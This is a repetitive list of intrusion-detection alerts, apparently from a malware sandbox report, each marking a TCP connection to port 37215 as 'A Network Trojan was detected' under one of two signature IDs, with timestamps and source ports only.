                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496040
                  SID:2835222
                  Source Port:57126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.684303
                  SID:2829579
                  Source Port:49458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767773
                  SID:2835222
                  Source Port:42692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766444
                  SID:2829579
                  Source Port:33474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766221
                  SID:2835222
                  Source Port:45050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737960
                  SID:2835222
                  Source Port:49838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.881161
                  SID:2835222
                  Source Port:40832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719089
                  SID:2829579
                  Source Port:36342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665384
                  SID:2835222
                  Source Port:40716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791734
                  SID:2829579
                  Source Port:38462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775873
                  SID:2829579
                  Source Port:56036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912259
                  SID:2829579
                  Source Port:56778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755631
                  SID:2835222
                  Source Port:37984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798521
                  SID:2829579
                  Source Port:36566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542687
                  SID:2835222
                  Source Port:52628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.749968
                  SID:2835222
                  Source Port:57796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584429
                  SID:2835222
                  Source Port:38244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588503
                  SID:2835222
                  Source Port:51202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718816
                  SID:2835222
                  Source Port:43546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.592925
                  SID:2829579
                  Source Port:39298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.904733
                  SID:2829579
                  Source Port:59634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316001
                  SID:2829579
                  Source Port:57420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487982
                  SID:2829579
                  Source Port:37834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886199
                  SID:2835222
                  Source Port:55020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.535998
                  SID:2829579
                  Source Port:60014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576254
                  SID:2835222
                  Source Port:37092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900366
                  SID:2835222
                  Source Port:44466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846756
                  SID:2835222
                  Source Port:58586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528216
                  SID:2835222
                  Source Port:57408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661985
                  SID:2829579
                  Source Port:37756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492349
                  SID:2835222
                  Source Port:40698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537472
                  SID:2829579
                  Source Port:34372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.864845
                  SID:2829579
                  Source Port:44134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550690
                  SID:2829579
                  Source Port:49148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.808806
                  SID:2835222
                  Source Port:35064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930519
                  SID:2829579
                  Source Port:50878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.673611
                  SID:2835222
                  Source Port:59150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292594
                  SID:2835222
                  Source Port:49858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843705
                  SID:2829579
                  Source Port:58310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790751
                  SID:2829579
                  Source Port:40960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529824
                  SID:2829579
                  Source Port:38960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911213
                  SID:2835222
                  Source Port:47604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788085
                  SID:2829579
                  Source Port:57686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766539
                  SID:2829579
                  Source Port:35868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729794
                  SID:2829579
                  Source Port:49400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886576
                  SID:2835222
                  Source Port:40940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530626
                  SID:2829579
                  Source Port:53288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912243
                  SID:2829579
                  Source Port:59310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576360
                  SID:2829579
                  Source Port:36148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527633
                  SID:2829579
                  Source Port:50030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551131
                  SID:2835222
                  Source Port:43310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649313
                  SID:2835222
                  Source Port:36218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847427
                  SID:2835222
                  Source Port:34416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547665
                  SID:2829579
                  Source Port:45548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577777
                  SID:2835222
                  Source Port:58034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591146
                  SID:2835222
                  Source Port:58114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.611064
                  SID:2829579
                  Source Port:53470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277628
                  SID:2835222
                  Source Port:52778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845224
                  SID:2835222
                  Source Port:51032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542657
                  SID:2835222
                  Source Port:55640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586903
                  SID:2829579
                  Source Port:45324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767570
                  SID:2835222
                  Source Port:35774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583532
                  SID:2829579
                  Source Port:48194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.771397
                  SID:2835222
                  Source Port:49240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583706
                  SID:2829579
                  Source Port:54344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906933
                  SID:2835222
                  Source Port:54188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542684
                  SID:2829579
                  Source Port:52362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527238
                  SID:2829579
                  Source Port:46046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.781216
                  SID:2835222
                  Source Port:46618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906931
                  SID:2829579
                  Source Port:49110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.689605
                  SID:2835222
                  Source Port:39500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806010
                  SID:2835222
                  Source Port:40226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799333
                  SID:2829579
                  Source Port:41792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907276
                  SID:2835222
                  Source Port:38662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907535
                  SID:2835222
                  Source Port:52060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.703011
                  SID:2829579
                  Source Port:44052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293151
                  SID:2835222
                  Source Port:58204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298967
                  SID:2835222
                  Source Port:41772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755613
                  SID:2829579
                  Source Port:32802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.929062
                  SID:2829579
                  Source Port:42694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.673792
                  SID:2835222
                  Source Port:48954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942534
                  SID:2835222
                  Source Port:49092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649662
                  SID:2835222
                  Source Port:44126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696013
                  SID:2835222
                  Source Port:53866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885400
                  SID:2829579
                  Source Port:44210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742912
                  SID:2835222
                  Source Port:45414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.604726
                  SID:2829579
                  Source Port:52098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583534
                  SID:2829579
                  Source Port:45212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767639
                  SID:2835222
                  Source Port:54766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.586462
                  SID:2829579
                  Source Port:51246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886757
                  SID:2835222
                  Source Port:60296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489739
                  SID:2829579
                  Source Port:39036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766338
                  SID:2829579
                  Source Port:33336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315973
                  SID:2835222
                  Source Port:46370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.587011
                  SID:2829579
                  Source Port:51870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492402
                  SID:2835222
                  Source Port:45128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651173
                  SID:2829579
                  Source Port:46134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578050
                  SID:2835222
                  Source Port:53026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661670
                  SID:2829579
                  Source Port:32924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923902
                  SID:2829579
                  Source Port:55544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696133
                  SID:2835222
                  Source Port:51218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591122
                  SID:2835222
                  Source Port:51784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.592762
                  SID:2835222
                  Source Port:39226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490201
                  SID:2835222
                  Source Port:48924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742597
                  SID:2835222
                  Source Port:43514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586995
                  SID:2835222
                  Source Port:32850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923912
                  SID:2835222
                  Source Port:55486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660420
                  SID:2835222
                  Source Port:52036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719258
                  SID:2829579
                  Source Port:42512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278228
                  SID:2829579
                  Source Port:42102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492458
                  SID:2835222
                  Source Port:41456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729784
                  SID:2829579
                  Source Port:39696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489898
                  SID:2835222
                  Source Port:49760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.660591
                  SID:2835222
                  Source Port:43108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591043
                  SID:2835222
                  Source Port:57282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.857169
                  SID:2829579
                  Source Port:39630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.586468
                  SID:2829579
                  Source Port:53422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886287
                  SID:2835222
                  Source Port:33928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.804068
                  SID:2835222
                  Source Port:42626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:12.604381
                  SID:2829579
                  Source Port:54172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661311
                  SID:2835222
                  Source Port:33824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628932
                  SID:2829579
                  Source Port:35088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886654
                  SID:2829579
                  Source Port:50666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496760
                  SID:2835222
                  Source Port:57086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886788
                  SID:2835222
                  Source Port:47788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651739
                  SID:2829579
                  Source Port:47826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.578711
                  SID:2829579
                  Source Port:46916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293553
                  SID:2835222
                  Source Port:58860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750221
                  SID:2835222
                  Source Port:35762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794540
                  SID:2835222
                  Source Port:60184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912219
                  SID:2829579
                  Source Port:36872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769836
                  SID:2829579
                  Source Port:49880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781097
                  SID:2835222
                  Source Port:40130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300924
                  SID:2835222
                  Source Port:47580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.785596
                  SID:2829579
                  Source Port:40534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.911514
                  SID:2835222
                  Source Port:59138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696086
                  SID:2835222
                  Source Port:56796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930393
                  SID:2829579
                  Source Port:59088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.931659
                  SID:2829579
                  Source Port:58234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719868
                  SID:2835222
                  Source Port:37356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887357
                  SID:2835222
                  Source Port:37900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809998
                  SID:2835222
                  Source Port:42498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.916130
                  SID:2835222
                  Source Port:57948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.669616
                  SID:2829579
                  Source Port:37200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.919285
                  SID:2835222
                  Source Port:37244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316338
                  SID:2835222
                  Source Port:49396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923978
                  SID:2829579
                  Source Port:44474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628578
                  SID:2829579
                  Source Port:50668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887911
                  SID:2829579
                  Source Port:55352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628522
                  SID:2829579
                  Source Port:59970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555847
                  SID:2829579
                  Source Port:48390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695245
                  SID:2829579
                  Source Port:37448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795740
                  SID:2829579
                  Source Port:54082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628148
                  SID:2835222
                  Source Port:46816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651187
                  SID:2829579
                  Source Port:42344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845940
                  SID:2835222
                  Source Port:52632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.669616
                  SID:2829579
                  Source Port:48658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529662
                  SID:2835222
                  Source Port:44190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651258
                  SID:2829579
                  Source Port:58416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650844
                  SID:2835222
                  Source Port:56536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720320
                  SID:2829579
                  Source Port:45874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696376
                  SID:2829579
                  Source Port:58214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796581
                  SID:2829579
                  Source Port:35492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694821
                  SID:2829579
                  Source Port:57634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576365
                  SID:2835222
                  Source Port:32996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.703045
                  SID:2835222
                  Source Port:35636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912803
                  SID:2835222
                  Source Port:44678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.544244
                  SID:2829579
                  Source Port:53016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660439
                  SID:2829579
                  Source Port:60046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886861
                  SID:2829579
                  Source Port:35354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.318347
                  SID:2835222
                  Source Port:60084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489468
                  SID:2829579
                  Source Port:53158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.652043
                  SID:2829579
                  Source Port:54464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.595907
                  SID:2835222
                  Source Port:41464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806140
                  SID:2835222
                  Source Port:35154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494420
                  SID:2829579
                  Source Port:46170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628148
                  SID:2829579
                  Source Port:35630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789784
                  SID:2829579
                  Source Port:53642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846636
                  SID:2829579
                  Source Port:43582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276199
                  SID:2835222
                  Source Port:39404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.879989
                  SID:2835222
                  Source Port:33518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719074
                  SID:2829579
                  Source Port:40400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908608
                  SID:2829579
                  Source Port:46774
                  Destination Port:37215
